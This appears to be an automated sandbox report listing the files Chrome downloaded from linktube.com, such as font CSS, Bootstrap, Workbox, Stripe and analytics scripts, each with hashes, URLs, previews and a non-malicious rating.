                                                                                                                    Preview:wOF2......D........l..D..........................(..P..R.`..~..*..b.....,..7..T..6.$..$. .....+..1.v.%......aJ...=........ .........DdBTH.......,(.....n.t.}.=...YE.D.....D.X.n........R.<....\.....,V.....u../......7.lX....l...n..........I.R.v`*.;...l..........3.b.:..g.......~.....U.I...B.......a ..6r.......[.[...5...=.:.....Vs..k.._F....V.:...9A.o..](n.Y7D...&Y7...GT.hY={..}....."<.B}....O(,B..!,.]>,g.....@..bc....{.~Y......<..h7@.....RP{...2..U.....$...E.mP.A.fI.^..7s.........%l..H./...@.&..O."......n.....JD...K.N...p......;..(.z.&f.3.....".....Y.. ...c..."..)..../Z.A.h. .....Pg.d..!..3:%Z.......c.F...B..../.W.t.$.v.v....%.w.....82B.V+..pOH2).}.m-i7C..&.. mM.b...~.....Q...B2....No.y/..oC..E.o.j.#.X4.0x...<..~...2K.$. ..h....M5......\..D9...N...../.w?..!....I%......HJsX.BZ.a ..h.c.. B..@...+_...\.M.n\7...P.].....k. S..cf..^.5....D..*../z@<...D.>......K..^....0...6.A...........f7...VE....C6.M.=.....gb...%.T..a..,E.A.Y,.a.!.P....e?.._|.
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):2858
                                                                                                                    Entropy (8bit):5.381509838044986
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:0FEE979DFB769CBF78E515184BA3E12B
                                                                                                                    SHA1:95EE6F3B8DF117B06FE0987F1D56E53C15E5B4FA
                                                                                                                    SHA-256:FEB34775E4927988ED3AACA072F8A7306A4D7506FBC48CDF0220570470A6BE14
                                                                                                                    SHA-512:5C30F96DAEE626677D28D5B352583B54C3FD37C34999711A3CE9BA9CCFD3EBBD54EA63E4FA2BC8DF9BC87621BD15FBA703A1D77295BD35D1E82C917C4157F870
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:"https://fonts.googleapis.com/css?family=Prompt:400,600&display=swap%7CPrompt:100,300,400,500,700,900&display=swap"
                                                                                                                    Preview:/* thai */.@font-face {. font-family: 'Prompt';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/prompt/v10/-W__XJnvUD7dzB2KdNodVkI.woff2) format('woff2');. unicode-range: U+02D7, U+0303, U+0331, U+0E01-0E5B, U+200C-200D, U+25CC;.}./* vietnamese */.@font-face {. font-family: 'Prompt';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/prompt/v10/-W__XJnvUD7dzB2Kb9odVkI.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Prompt';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/prompt/v10/-W__XJnvUD7dzB2KbtodVkI.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (56960)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):57146
                                                                                                                    Entropy (8bit):4.692203979021687
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:22D85286C513F3D4038C42B486EA1BF6
                                                                                                                    SHA1:E3489956D992F37C2DCC37996BD2C18BBB221352
                                                                                                                    SHA-256:0AE50F2A98AD805992350B8F0CBE5C11F3CE3894FFF9BC149617EE98327D088E
                                                                                                                    SHA-512:F4DC9F0B62F1F9F68BBDEE01D7AF295A04C41C7DD3E743417D52C5D5A95DBD0C6FC318D874D36EEC741028E7A1416EABE6FD6BF5058351ED4148540F31B0797F
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/fontawesome.min.css
                                                                                                                    Preview:/*!. * Font Awesome Free 5.13.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pu
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (11801)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):340164
                                                                                                                    Entropy (8bit):5.600130149613627
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:A4DC59585CA3099C707CC0FADDE7591F
                                                                                                                    SHA1:98C15F160D44FCE1821AACC15DA5C1CE0D929E74
                                                                                                                    SHA-256:A15BC08C449106B74C64A18340B96332B30097AFEE730DE4656B5CB65E29A0BD
                                                                                                                    SHA-512:95DA11E3919B26F8CD976682BA49B0902D442C1FABA4FF86CBE2A4BC3DEEC3E1AE1EE35FE6ECDD4C061B61022F0CA64A46BD9B4F4938DBD5CF842A92E7E5AFC5
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://www.googletagmanager.com/gtm.js?id=GTM-TDFCSVL
                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"48",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-168909197-1","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__e"},{"function":"__gas","vtp_cookieDomain":"auto","vtp_useEcommerceDataLayer":true,"vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":true,"vtp_trackingId":"UA-168909197-1","vtp_enableRecap
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (60819), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):60819
                                                                                                                    Entropy (8bit):5.4839527999983755
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:D9C6DE0DF2BF028D93924AFF92487904
                                                                                                                    SHA1:6596050516DD12AF52D9B0E7B18ED837F1D81300
                                                                                                                    SHA-256:769A555DE553BABC35A3338F344DD7AA16260C93CEA2C7DB290707C90484E7CC
                                                                                                                    SHA-512:6BE4940EEC0DCD70EFCF85EB21C5C7B827F4F3DFE2240A0DE259AB5C9835F179DDB8A2BA6250C73516A5BF8C9DD4DE3438A23CD2D162745FABA9314A18FA1615
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js
                                                                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var W,O,I,U,K,X,L,l,j,T,t,N,q,e,Z,V,G,J,Q,Y,$,t1,e1,r1,i1,o1,n1,s,s1,c1,a1,h1,l1,o,f1,r,d1,u1,n,c,a,h,f,d,i=function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},o=t.lib={},n=o.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function()
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:JSON data
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):221
                                                                                                                    Entropy (8bit):4.644028938934629
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:228775FE38FD12187F1907DA45C6F618
                                                                                                                    SHA1:8352F468CD54B8730864739D83A7592F2B33C750
                                                                                                                    SHA-256:F65191A6F5087992294B4AA2BD2B6AF5D0EDB04BF3B84AA9AB5C56EA3C9182FE
                                                                                                                    SHA-512:4BA95C295426923CB61DAD7F314BC8DA87898301134F83C73238FFE59E6A7299095583BCC8A48FC4607A0FE88AB2E3BE9981C1B77CDE9AA560832941B39B05E0
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://linktube.com/_nuxt/manifest.4ba95c29.json
                                                                                                                    Preview:{"name":"linktube","short_name":"linktube","description":"One Link: Limitless Possibilities","icons":[],"start_url":"/?standalone=true","display":"browser","background_color":"#ffffff","theme_color":"#19ac56","lang":"en"}
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1286)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):1288
                                                                                                                    Entropy (8bit):5.153513900991883
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:4452D76CDDFC2C0BE93D0336A93A97C2
                                                                                                                    SHA1:4AFBB349400AC3E74EAF4D48EF9C6FDFC8227205
                                                                                                                    SHA-256:D6F5F2D044FD5A93763E207357FB24E66A4A062C1CD51809940F0D9157805977
                                                                                                                    SHA-512:5E44BB6263CEFF806AFBF6F17FBEEDB517DB8A4E0DBF5A30876A9D5711523089F81328CFFEDF42910A912AD3EEF7CA6A9DE8F8C742008FB826DF409AE7450C92
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-sw.js
                                                                                                                    Preview:!function(){"use strict";try{self["workbox:sw:4.3.1"]&&_()}catch(t){}const t="https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox",e={backgroundSync:"background-sync",broadcastUpdate:"broadcast-update",cacheableResponse:"cacheable-response",core:"core",expiration:"expiration",googleAnalytics:"offline-ga",navigationPreload:"navigation-preload",precaching:"precaching",rangeRequests:"range-requests",routing:"routing",strategies:"strategies",streams:"streams"};self.workbox=new class{constructor(){return this.v={},this.t={debug:"localhost"===self.location.hostname,modulePathPrefix:null,modulePathCb:null},this.s=this.t.debug?"dev":"prod",this.o=!1,new Proxy(this,{get(t,s){if(t[s])return t[s];const o=e[s];return o&&t.loadModule(`workbox-${o}`),t[s]}})}setConfig(t={}){if(this.o)throw new Error("Config must be set before accessing workbox.* modules");Object.assign(this.t,t),this.s=this.t.debug?"dev":"prod"}loadModule(t){const e=this.i(t);try{importScripts(e),this.o=!0}catch(s){throw console.
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (3421), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):3421
                                                                                                                    Entropy (8bit):5.430002818360638
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:34211ED51795485124469A0D271B121E
                                                                                                                    SHA1:F23D1AB1CA0697B9F6A0576959E9C207F42C3400
                                                                                                                    SHA-256:6968A2426ABEF7760B5C60161F8C848C8C2843FB33F26ABD870BCB2B36AE0188
                                                                                                                    SHA-512:BBA4D60A6530DB6AD9A35C436262D3C6B3FBAADE2171798A05389B7ADDC3A075CCA3D15CD4C3A8FF7BA62C489C7695E53707502B10DADC8F82CEF67742363A27
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://linktube.com/_nuxt/e114ae80e4b2d47f2989.js
                                                                                                                    Preview:!function(e){function r(data){for(var r,c,o=data[0],d=data[1],l=data[2],i=0,h=[];i<o.length;i++)c=o[i],Object.prototype.hasOwnProperty.call(n,c)&&n[c]&&h.push(n[c][0]),n[c]=0;for(r in d)Object.prototype.hasOwnProperty.call(d,r)&&(e[r]=d[r]);for(v&&v(data);h.length;)h.shift()();return f.push.apply(f,l||[]),t()}function t(){for(var e,i=0;i<f.length;i++){for(var r=f[i],t=!0,c=1;c<r.length;c++){var d=r[c];0!==n[d]&&(t=!1)}t&&(f.splice(i--,1),e=o(o.s=r[0]))}return e}var c={},n={38:0},f=[];function o(r){if(c[r])return c[r].exports;var t=c[r]={i:r,l:!1,exports:{}};return e[r].call(t.exports,t,t.exports,o),t.l=!0,t.exports}o.e=function(e){var r=[],t=n[e];if(0!==t)if(t)r.push(t[2]);else{var c=new Promise((function(r,c){t=n[e]=[r,c]}));r.push(t[2]=c);var f,script=document.createElement("script");script.charset="utf-8",script.timeout=120,o.nc&&script.setAttribute("nonce",o.nc),script.src=function(e){return o.p+""+{0:"b0283421e92e0dd0ac03",1:"b894b6aec53e6def5e32",2:"85ae7cee2ddbc92082ce",3:"08d1b
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (8877), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):8877
                                                                                                                    Entropy (8bit):5.167486947495661
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:3FE8ADB93AC98CD7982DD5D0059281EB
                                                                                                                    SHA1:CB13B272DA7BDD178F687192CE9FF22610CACC03
                                                                                                                    SHA-256:910740C1B3F955C8BBF9733571BA15EDC51BAEC593486789DC853BC1FCE2C6C6
                                                                                                                    SHA-512:B0486B55BD86EBDBA2ECD06EA01C2B5746B308EA1B78FEEA2EB2581A936262975328E4478028C9C00B26A63144196CDAA0B9DAD3D0B79358205C6BBA63F8BA79
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://linktube.com/_nuxt/30e4908824f75617b76a.js
                                                                                                                    Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[6],{536:function(t,e,r){var content=r(537);"string"==typeof content&&(content=[[t.i,content,""]]),content.locals&&(t.exports=content.locals);(0,r(14).default)("2d62e390",content,!0,{sourceMap:!1})},537:function(t,e,r){(e=r(13)(!1)).push([t.i,".v-carousel{overflow:hidden;position:relative;width:100%}.v-carousel__controls{align-items:center;background:rgba(0,0,0,.3);bottom:0;display:flex;height:50px;justify-content:center;list-style-type:none;position:absolute;width:100%;z-index:1}.v-carousel__controls>.v-item-group{flex:0 1 auto}.v-carousel__controls__item{margin:0 8px}.v-carousel__controls__item .v-icon{opacity:.5}.v-carousel__controls__item--active .v-icon{opacity:1;vertical-align:middle}.v-carousel__controls__item:hover{background:none}.v-carousel__controls__item:hover .v-icon{opacity:.8}.v-carousel__progress{margin:0;position:absolute;bottom:0;left:0;right:0}.v-carousel .v-window-item{display:block;height:inherit;text-decoration:n
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (9516)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):257858
                                                                                                                    Entropy (8bit):5.448535030852012
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:47E4C1B0EEEF036BD5FE9707884B1030
                                                                                                                    SHA1:727F6472F142B923DD493E1DBD1F7AAB30C6001C
                                                                                                                    SHA-256:84C6AEA30ECF82EA98B5B294C80B3F3302E6110101F6207B899D97B14EA5C384
                                                                                                                    SHA-512:6326112E30D1CCEB81501DBEB15FB0E66C382A36896B3D0E0E0FA9FA66267C51E5FE4D06725A343238F5B2E8BA8123BDDFFFAD72DC28966D67924A31C8A68EBB
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (4190)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):4192
                                                                                                                    Entropy (8bit):5.090097100461267
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:DD1A8EF23FE015E43B54D70AFD630C87
                                                                                                                    SHA1:A9652C5BDF72085343EEA41F49E41610889EF833
                                                                                                                    SHA-256:8864CC4ADC1878AA3D02609C6F926A44CB2A6797E26F4E6EAE9FCCD487A0D0BC
                                                                                                                    SHA-512:1AD74188809ABBF8D30C8A022597CBA7D215D459583A2BA535F2D0501CB5865214C370BE852E9CA3D9F1C0BB2C6ECA29E35522C16C431782627410D5A795BC94
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-precaching.prod.js
                                                                                                                    Preview:this.workbox=this.workbox||{},this.workbox.precaching=function(t,e,n,s,c){"use strict";try{self["workbox:precaching:4.3.1"]&&_()}catch(t){}const o=[],i={get:()=>o,add(t){o.push(...t)}};const a="__WB_REVISION__";function r(t){if(!t)throw new c.WorkboxError("add-to-cache-list-unexpected-type",{entry:t});if("string"==typeof t){const e=new URL(t,location);return{cacheKey:e.href,url:e.href}}const{revision:e,url:n}=t;if(!n)throw new c.WorkboxError("add-to-cache-list-unexpected-type",{entry:t});if(!e){const t=new URL(n,location);return{cacheKey:t.href,url:t.href}}const s=new URL(n,location),o=new URL(n,location);return o.searchParams.set(a,e),{cacheKey:o.href,url:s.href}}class l{constructor(t){this.t=e.cacheNames.getPrecacheName(t),this.s=new Map}addToCacheList(t){for(const e of t){const{cacheKey:t,url:n}=r(e);if(this.s.has(n)&&this.s.get(n)!==t)throw new c.WorkboxError("add-to-cache-list-conflicting-entries",{firstEntry:this.s.get(n),secondEntry:t});this.s.set(n,t)}}async install({event:t,pl
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:PNG image data, 327 x 327, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):22167
                                                                                                                    Entropy (8bit):7.977634071094655
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:20AD000785090F59949EDF7067C2CB9B
                                                                                                                    SHA1:5BC0F3246678FF8BF2D0DD707D4CDE6A573E5B77
                                                                                                                    SHA-256:904553121709D92606D98AE429A4D1BD19954EAEA66268777F084A00798670C2
                                                                                                                    SHA-512:4725D854ABEFCEAEDDBC4A5600FFC71195A63DA815F3A246B64A0479F5D8144862380622A66C3993E9BC893B5E49ACE5D67B239B806508B8D754793212F558AA
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://api.linktube.com/storage/projects/12741/avatars/RotZvuHFZltAXAC1.png
                                                                                                                    Preview:.PNG........IHDR...G...G.....2I.k.. .IDATx^.].x.....\..mj...B..@.. .........{3..N..f..m.d...s.JF.I..;mW.%.IX.3.7s.[.{!Cz.->)Y..x...1{..%$X.iOW.T.......R.h.d.<3...L8..I.1.....BGu..>......i++..4.=O...U.=..^......G"...(qq...2...e..{KBZzX.5,],y.\/%.=-.[m-s..O..f{.ON..|.|.9o...q..=..t..s..........]F....0.N..'..S..dI.5:,xHF...D..EF.....6e..F.j..BV..J...jn.k..%E@.p...cBz......>c...s.c..twK.oI.C.I......./..#ZkW.=..G*.~C..."..v..tt.u...".........Q;.,......mOl...B.i.r...cI.6.[..$!=#.....)y.IY~.%.RX...o...O....$..'Gn..L.i'.&SO8%.._G}.tTUJbV.$.......ZZ,k.G..y..WV.{..."....@T.c|j......./..Ys."6n....D..zG2'......?R..s..P......"...QA.$4n.g...2v...o...a.Ti..`.]..............Yb..."Wb..p......N...$.O=CR..w......MJ...,...9?..F..s}..@..D.92&q..~!s/.D.6.T......._i+/....K.m7........X.....!Gn.Gl...<.....%13.^$.:[..%...uR..S.Y_7.U4..)..*.C"0.K%z...c....+3..gI.8.. .....k........R...7.y{...go{.WW.|.@T.#...F8./.K.....3c.....7^,.k.4.1...;..G.D.9.......9.
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65529), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):88793
                                                                                                                    Entropy (8bit):5.413865382969959
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:FD35981A337052CD3CCD82DC674FF76D
                                                                                                                    SHA1:E11E8DF31D4748D5348ECEC37C01C4DA1549F321
                                                                                                                    SHA-256:BD6E71E0A8F18B3DD4BBEB6FD673015FEC896BD92E17C11F3DC8FE96A06DE1F4
                                                                                                                    SHA-512:9D7A20899C255FC008683F2DCAFDA6332B19B56CA88850661F25245DC4844059404D7D2FEE7C4249775ABA92A61F4870393FCCBAE8A74B12463CF903F05143E3
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://m.stripe.network/out-4.5.44.js
                                                                                                                    Preview:var StripeM=function(e){var t={};function n(r){if(t[r])return t[r].exports;var _=t[r]={i:r,l:!1,exports:{}};return e[r].call(_.exports,_,_.exports,n),_.l=!0,_.exports}return n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var _ in e)n.d(r,_,function(t){return e[t]}.bind(null,_));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=30)}([function(e,t,n){"use strict";(function(e){n.d(t,"a",(function(){retur
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (50758)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):51039
                                                                                                                    Entropy (8bit):5.247253437401007
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                                                    SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                                                    SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                                                    SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                                                                    Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (36776), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):36776
                                                                                                                    Entropy (8bit):5.415910137542195
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:B412FFE581A644C4EECB6B051B7FFB41
                                                                                                                    SHA1:8C2614BC13FDF8B3659C85CDAB3AED97EBD45147
                                                                                                                    SHA-256:B0218261F348EB67F7211EE7067B59884C870C3651C3701365DD28B944A50375
                                                                                                                    SHA-512:E346F29C96C969414B1C5D124FC2B31E78F74194D5D2BC4D03ECC0771B07BE3B5B8E34CEF16841443228BFA1EA45FABFB4869D05CEA685FD53081A3AAC03E574
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://app.factors.ai/assets/factors.js
                                                                                                                    Preview:var factors=function(e){var t={};function r(n){if(t[n])return t[n].exports;var i=t[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,r),i.l=!0,i.exports}return r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var i in e)r.d(n,i,function(t){return e[t]}.bind(null,i));return n},r.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return r.d(t,"a",t),t},r.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r.p="",r(r.s=7)}([function(e,t){e.exports={info:function(e){console.log(e)},error:functi
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):995
                                                                                                                    Entropy (8bit):4.336056882255299
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:AFA7DF291AF97DEEFF2BDAAA1782BCA9
                                                                                                                    SHA1:AB87E82D7400E4AB4814FA72F8C729A56CFF3478
                                                                                                                    SHA-256:6122A9C64F348250C8EA21E20C4B482BA0E446488ED2EBC4C4075366DD09AD73
                                                                                                                    SHA-512:E589E7955E7094FF188A3CE53AB4E06DEC78011E22C52B7563C70B1A2D87054F5D6AFEF834CC7D5DDBF183215CF472D12875C6750E59995955CC6797221FF51B
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://linktube.com/sw.js
